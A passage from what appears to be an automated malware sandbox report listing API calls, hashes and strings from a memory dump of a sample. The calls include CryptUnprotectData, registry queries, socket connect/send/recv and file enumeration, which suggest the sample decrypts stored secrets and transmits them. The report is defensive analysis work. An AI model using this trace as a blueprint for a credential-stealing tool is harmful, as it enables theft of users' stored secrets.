                  • String ID: :$could not resolve to any addresses$data provided contains a nul byteSleepConditionVariableSRWkernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive$invalid socket addressinvalid port valuestrings passed to WinAPI cannot contain NULsinvalid utf-8: corrupt contentsinvalid utf-8stream did not contain valid UTF-8
                  • API String ID: 1841633148-1692676443
                  • Opcode ID: 65545ec4360f278f7fce114d2124e79559e53257a287fb675380f28c28b50d81
                  • Instruction ID: cca18a1fbea1619a5e1ceafe989a7d84fdd2c2645a0103c7d7792ff35d755b2d
                  • Opcode Fuzzy Hash: 65545ec4360f278f7fce114d2124e79559e53257a287fb675380f28c28b50d81
                  • Instruction Fuzzy Hash: A9B25D71A087818FD324DF25C4817ABF7E1FFC9314F108A2EE5899B291DB749989CB46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                  • String ID: `PC
                  • API String ID: 1672962128-3807928140
                  • Opcode ID: 8748a492f4925a44f451fa2f04ad84413a0df61c771f2ca5b269b17df2be296d
                  • Instruction ID: e3ad7991db59e3ca4ea8c649164211cf4c5ce35165762688abb2758fda9ae006
                  • Opcode Fuzzy Hash: 8748a492f4925a44f451fa2f04ad84413a0df61c771f2ca5b269b17df2be296d
                  • Instruction Fuzzy Hash: F471A174A042008FDB14DFA5E8817AABBF0FB49705F50453EE944AB3A1D77DAD44CB8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_cexit_inittermmemcpystrlen
                  • String ID: `PC
                  • API String ID: 738594520-3807928140
                  • Opcode ID: e540b2c3a16b03490bd264bd0621dc4acd35348cbb3f5a7c44d01cb6ccdfbd0d
                  • Instruction ID: e6e361ffeaa0da957a2ac7bb49f58499f13ba3656c4e80dd41b8bf274b0af86b
                  • Opcode Fuzzy Hash: e540b2c3a16b03490bd264bd0621dc4acd35348cbb3f5a7c44d01cb6ccdfbd0d
                  • Instruction Fuzzy Hash: 7B413CB8A043008FDB10EF65E881799BBF0FB89709F10853ED98497361D778A944CF5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                  • String ID: `PC
                  • API String ID: 1672962128-3807928140
                  • Opcode ID: 4a727354bd41790a88e3d2b1f162d7165e1dd398ae18037a40eba07a4ee7b51e
                  • Instruction ID: c58e9f807da62276afc82b5e192ce8ae9b5dccad1d061ac5ce7a3b601894ad4f
                  • Opcode Fuzzy Hash: 4a727354bd41790a88e3d2b1f162d7165e1dd398ae18037a40eba07a4ee7b51e
                  • Instruction Fuzzy Hash: 1A517C74A002008FDB10DF69E88179ABBF0FB89709F10453EE9449B361D778A944CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040BD8F
                  • memmove.MSVCRT ref: 0040BDBF
                  • LocalFree.KERNEL32(?,00000000,00000000,?), ref: 0040BDCB
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectmemmove
                  • String ID: .<@
                  • API String ID: 1275420628-3367864983
                  • Opcode ID: bab0380084628facf5d9df60220285807e6333fe18211a03b14505c613c24b62
                  • Instruction ID: 1e872254c75208275c4192c08c24987378cf00c31cc8f7bee8a763e4ad058cbb
                  • Opcode Fuzzy Hash: bab0380084628facf5d9df60220285807e6333fe18211a03b14505c613c24b62
                  • Instruction Fuzzy Hash: 6FD16871908B459FC311CF25C48065BBBF5FFC9358F208A1EE4896B251DB74E986CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,00429C99,?,?,?,?,?,?,?,?,0040238E), ref: 0042937F
                  • memset.MSVCRT ref: 004293C4
                  • DeviceIoControl.KERNEL32 ref: 004293E5
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ControlDeviceFileHandleInformationmemset
                  • String ID:
                  • API String ID: 2311885070-0
                  • Opcode ID: 574e9711f156348d04f33f3a86782e6b3470dce432817fa0db677d24d0efa13c
                  • Instruction ID: 02c60c0b0feb5c7c9a033baeff54817eea31a05f097ce1dab99b4ab53af41aed
                  • Opcode Fuzzy Hash: 574e9711f156348d04f33f3a86782e6b3470dce432817fa0db677d24d0efa13c
                  • Instruction Fuzzy Hash: 5C4114B0A087009FD324CF1AD481B6AFBF5FFC8314F50892EE98A87750D775A8458B5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • recv.WS2_32(?,?,7FFFFFFF,00000000), ref: 0042A68F
                  • WSAGetLastError.WS2_32(?,?,0040F340,00000000,?), ref: 0042A69E
                  • WSAGetLastError.WS2_32(?,?,0040F340,00000000,?), ref: 0042A6B2
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ErrorLast$recv
                  • String ID:
                  • API String ID: 316788870-0
                  • Opcode ID: 469c0b2d10d8660a71951af34ec0366f4c448b8a5f8c1a0f3310c9dc4ebbc232
                  • Instruction ID: f3b235f5448d2b4cece8ab5347d9eabcd5e59dbbeff251ebc60d087194793d7b
                  • Opcode Fuzzy Hash: 469c0b2d10d8660a71951af34ec0366f4c448b8a5f8c1a0f3310c9dc4ebbc232
                  • Instruction Fuzzy Hash: 9BF082716106106BD724AAB4980576672E4DB48724F208A2FE8AAC72D1DA78E4504A5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00429771: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 0042979F
                  • memmove.MSVCRT ref: 00412E06
                  • memmove.MSVCRT ref: 00412F12
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: memmove$FilePointer
                  • String ID:
                  • API String ID: 2310539373-0
                  • Opcode ID: da17f3e1e8571fa25a23a677538bb4f4eb63e68dcd72a932e0b956170cb54914
                  • Instruction ID: 1ed6ac2d24935139b4f6290924fc40b157a19ad7a962c29fe3751524382fbe52
                  • Opcode Fuzzy Hash: da17f3e1e8571fa25a23a677538bb4f4eb63e68dcd72a932e0b956170cb54914
                  • Instruction Fuzzy Hash: 68823771A08781CFC724CF25C5907ABB7E1BFC9315F10892EE4899B351DB789986CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: memcpy$ErrorLast$FileFindNextmemset
                  • String ID:
                  • API String ID: 2231764315-0
                  • Opcode ID: ddbc644feed9f87f5997584ce074c5d54684d658f9ec871ddfde146ce0829858
                  • Instruction ID: 9e87e96f9dcd3ddcf5ca2db65e65425cf52b5a3825ee5d437b37d93a802ed792
                  • Opcode Fuzzy Hash: ddbc644feed9f87f5997584ce074c5d54684d658f9ec871ddfde146ce0829858
                  • Instruction Fuzzy Hash: 03610971508B449FC321EF25D885AABB3E4FFC9304F148A2EE88D4B252DB34A845CB46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WSASocketW.WS2_32(00000002,00000001,00000000,00000000,00000000,00000081), ref: 00402E15
                  • connect.WS2_32(00000000,?,00000010), ref: 00402E32
                  • closesocket.WS2_32(00000000), ref: 00402E61
                  • WSAGetLastError.WS2_32 ref: 00402E6B
                  • WSASocketW.WS2_32(00000002,00000001,00000000,00000000,00000000,00000001), ref: 00402E8C
                  • SetHandleInformation.KERNEL32(00000000,00000001,00000000,00000002,00000001,00000000,00000000,00000000,00000001), ref: 00402E9D
                  • closesocket.WS2_32(00000000), ref: 00402ED8
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Socketclosesocket$ErrorHandleInformationLastconnect
                  • String ID:
                  • API String ID: 2466617131-0
                  • Opcode ID: 4721a1dab41b90c94848229a87c6aca418958c3b85086d81bde12f1b014a1916
                  • Instruction ID: 4da0d469031575bf6afc84133db2019047ac78350077b27a374ff3ffae34df55
                  • Opcode Fuzzy Hash: 4721a1dab41b90c94848229a87c6aca418958c3b85086d81bde12f1b014a1916
                  • Instruction Fuzzy Hash: BB41F671A402119FEB249A24CD85B7FB7A5EB85720F24853FF904AF3C1C6B89C42D699
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,?,?,?,00422892,?,?,?,?,?,?,?,00428202,?,?), ref: 00420343
                  • HeapReAlloc.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00422892,?,?,?,?), ref: 0042034D
                  • GetProcessHeap.KERNEL32(?,?,?,?,00422892,?,?,?,?,?,?,?,00428202,?,?), ref: 00420358
                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,00422892,?,?,?,?,?,?,?,00428202), ref: 00420361
                  • memcpy.MSVCRT ref: 00420385
                  • GetProcessHeap.KERNEL32(?,?,00428105,?,?,?,?,?,?,00401D64,?,?,?,00000000,?), ref: 0042038D
                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,00428105,?,?,?,?,?,?,00401D64,?,?,?), ref: 00420398
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Heap$Process$Alloc$Freememcpy
                  • String ID:
                  • API String ID: 3452495767-0
                  • Opcode ID: ac4ac381551121c931df6672444570e0a4e36a02780e552e3e19d529a7b95dbf
                  • Instruction ID: 6ae3fd09a152b551b1e8bb5d74d6f0dd60c46e3abb93c7a0b1baaa32477b8f68
                  • Opcode Fuzzy Hash: ac4ac381551121c931df6672444570e0a4e36a02780e552e3e19d529a7b95dbf
                  • Instruction Fuzzy Hash: 8201D6717053146FD610AAB6ADC1F9F76DC9BC935CF01103EBA4593243E56CA804417D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: malloc$_cexitmemcpystrlen
                  • String ID:
                  • API String ID: 701060287-0
                  • Opcode ID: 88c6f0e44087c42403907007df445f3ac44e41c076fab1344ab4ff46b99ced03
                  • Instruction ID: a5091d358589167bcc892d268cda26a59ee3b23989f35f5bfa3aa8e21b73ff37
                  • Opcode Fuzzy Hash: 88c6f0e44087c42403907007df445f3ac44e41c076fab1344ab4ff46b99ced03
                  • Instruction Fuzzy Hash: BE3157B9A003018FDB20DF65E881699BBF1FB89705F14463EE944A7365E739AA04CF49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: malloc$_cexitmemcpystrlen
                  • String ID:
                  • API String ID: 701060287-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E679
                  • RegQueryValueExW.ADVAPI32(0041C3A9,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E6BF
                  • RegCloseKey.ADVAPI32(0041C3A9,0041C3A9,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E6D4
                  • RegCloseKey.ADVAPI32(0041C3A9,0041C3A9,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E708
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Close$OpenQueryValue
                  • String ID:
                  • API String ID: 1607946009-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,00415DD5), ref: 0040E756
                  • RegQueryValueExW.ADVAPI32(00415DD5,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000101,00415DD5), ref: 0040E79C
                  • RegCloseKey.ADVAPI32(00415DD5,00415DD5,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000101,00415DD5), ref: 0040E7B1
                  • RegCloseKey.ADVAPI32(00415DD5,00415DD5,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000101,00415DD5), ref: 0040E7E5
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Close$OpenQueryValue
                  • String ID:
                  • API String ID: 1607946009-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ReadFile.KERNEL32(?,?,o!@,o!@,00000000,?,0040216F,?,0040B598,?,?,?,0040B598,?,00000001,?), ref: 004292F8
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: FileRead
                  • String ID: o!@$o!@
                  • API String ID: 2738559852-3792276911
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?,?,?,004281C2), ref: 004228E4
                  • HeapAlloc.KERNEL32(00000000,00000008,?,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?), ref: 004228ED
                  • GetProcessHeap.KERNEL32(?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?,?,?,004281C2), ref: 0042290B
                  • HeapAlloc.KERNEL32(00000000,00000008,?,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?), ref: 00422914
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Heap$AllocProcess
                  • String ID:
                  • API String ID: 1617791916-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202), ref: 0042A819
                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?), ref: 0042A822
                  • GetProcessHeap.KERNEL32(?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202), ref: 0042A82D
                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?), ref: 0042A836
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Heap$AllocProcess
                  • String ID:
                  • API String ID: 1617791916-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,00419D1B), ref: 0040D008
                  • RegQueryValueExW.ADVAPI32(00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D04E
                  • RegCloseKey.ADVAPI32(00419D1B,00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D05F
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?,?,00428105), ref: 00420308
                  • GetProcessHeap.KERNEL32(?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?,?,00428105), ref: 00420310
                  • HeapFree.KERNEL32(00000000,00000000,?,?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?), ref: 0042031B
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Heap$Process$Free
                  • String ID:
                  • API String ID: 3168794593-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • send.WS2_32(?,?,7FFFFFFF,00000000), ref: 00402221
                  Strings
                  • failed to write whole buffer:, xrefs: 0040229C
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: send
                  • String ID: failed to write whole buffer:
                  • API String ID: 2809346765-228929174
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 0042A962: GetFileInformationByHandle.KERNEL32(?,?), ref: 0042A99C
                    • Part of subcall function 0042A962: CloseHandle.KERNEL32(?,?,?), ref: 0042A9B6
                  • memcpy.MSVCRT ref: 0040DC65
                  • memcpy.MSVCRT ref: 0040DCD2
                    • Part of subcall function 0042BAF9: memcpy.MSVCRT ref: 0042BB37
                    • Part of subcall function 0042BAF9: memcpy.MSVCRT ref: 0042BB56
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: memcpy$Handle$CloseFileInformation
                  • String ID:
                  • API String ID: 4527847-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileW.KERNEL32(?,?,?,?,00000004,004294C4,00000000,?,?,?,?,?,?,?,?), ref: 00429659
                  • GetLastError.KERNEL32(?,?,?,?,00000004,004294C4,00000000,?,?,?,?,?,?,?,?), ref: 0042966A
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CreateErrorFileLast
                  • String ID:
                  • API String ID: 1214770103-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 0042979F
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,00415B8E,0000000E), ref: 00429D2B
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • shutdown.WS2_32(?,00000002), ref: 0042A648
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: shutdown
                  • String ID:
                  • API String ID: 2510479042-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • FindClose.KERNEL32(00000007,?,?,00428202,?,?,?,004281C2,?,?,00428105,?,?,?,?,?), ref: 0042A8BE
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,0040238E,?,?,?,?,?,?), ref: 00429C9A
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  APIs
                  • memset.MSVCRT ref: 0042618A
                  • GetModuleHandleW.KERNEL32(NTDLL.DLL,00000001,?,0042A13C), ref: 004261A4
                  • FormatMessageW.KERNEL32(00001200,00000000,?,00000800,?,00000800,00000000,00000001,?,0042A13C), ref: 004261D0
                  • GetLastError.KERNEL32(00001200,00000000,?,00000800,?,00000800,00000000,00000001,?,0042A13C), ref: 004263C8
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ErrorFormatHandleLastMessageModulememset
                  • String ID: NTDLL.DLL
                  • API String ID: 1434010500-1613819793
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434FCF
                  • UnhandledExceptionFilter.KERNEL32 ref: 00434FDF
                  • GetCurrentProcess.KERNEL32 ref: 00434FE8
                  • TerminateProcess.KERNEL32 ref: 00434FF9
                  • abort.MSVCRT ref: 00435002
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                  • String ID:
                  • API String ID: 520269711-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434FCF
                  • UnhandledExceptionFilter.KERNEL32 ref: 00434FDF
                  • GetCurrentProcess.KERNEL32 ref: 00434FE8
                  • TerminateProcess.KERNEL32 ref: 00434FF9
                  • abort.MSVCRT ref: 00435002
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                  • String ID:
                  • API String ID: 520269711-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040CEF6
                  • memmove.MSVCRT ref: 0040CF1C
